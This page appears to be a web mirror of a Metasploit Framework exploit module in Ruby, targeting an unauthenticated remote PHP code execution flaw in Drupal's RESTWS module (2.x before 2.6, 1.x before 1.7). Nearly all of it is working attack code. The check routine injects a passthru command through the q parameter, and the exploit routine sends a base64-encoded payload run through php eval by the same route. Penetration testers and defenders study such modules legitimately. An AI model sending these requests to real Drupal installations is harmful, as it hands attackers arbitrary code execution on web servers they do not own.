Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/drupal_restws_exec.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Drupal RESTWS Module Remote PHP Code Execution',

16
        'Description' => %q{

17
          This module exploits a Remote PHP Code Execution vulnerability in the

18
          Drupal RESTWS Module. Unauthenticated users can execute arbitrary code

19
          under the context of the web server user.

20


21
          RESTWS alters the default page callbacks for entities to provide

22
          additional functionality. A vulnerability in this approach allows

23
          an unauthenticated attacker to send specially crafted requests resulting

24
          in arbitrary PHP execution. RESTWS 2.x prior to 2.6 and 1.x prior to 1.7

25
          are affected by this issue.

26


27
          This module was tested against RESTWS 2.5 with Drupal 7.5 installed on

28
          Ubuntu Server.

29
        },

30
        'License' => MSF_LICENSE,

31
        'Author' => [

32
          'Devin Zuczek', # discovery

33
          'Mehmet Ince <[email protected]>' # msf module

34
        ],

35
        'References' => [

36
          ['URL', 'https://www.drupal.org/node/2765567']

37
        ],

38
        'Privileged' => false,

39
        'Payload' => {

40
          'DisableNops' => true

41
        },

42
        'Platform' => ['php'],

43
        'Arch' => ARCH_PHP,

44
        'Targets' => [ ['Automatic', {}] ],

45
        'DisclosureDate' => '2016-07-13',

46
        'DefaultTarget' => 0,

47
        'Notes' => {

48
          'Reliability' => UNKNOWN_RELIABILITY,

49
          'Stability' => UNKNOWN_STABILITY,

50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

51
        }

52
      )

53
    )

54


55
    register_options(

56
      [

57
        OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/'])

58
      ]

59
    )

60
  end

61


62
  def check

63
    r = rand_text_alpha(8 + rand(4))

64


65
    res = send_request_cgi(

66
      'method' => 'GET',

67
      'uri' => normalize_uri(target_uri.path, 'index.php'),

68
      'vars_get' => {

69
        'q' => "taxonomy_vocabulary//passthru/printf '#{Rex::Text.to_octal(r)}'"

70
      }

71
    )

72


73
    if res && res.body.include?(r)

74
      Exploit::CheckCode::Vulnerable

75
    else

76
      Exploit::CheckCode::Safe

77
    end

78
  end

79


80
  def exploit

81
    cmd = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"

82


83
    send_request_cgi(

84
      'method' => 'GET',

85
      'uri' => normalize_uri(target_uri.path, 'index.php'),

86
      'vars_get' => {

87
        'q' => "taxonomy_vocabulary//passthru/#{cmd}"

88
      }

89
    )

90
  end

91
end

92


93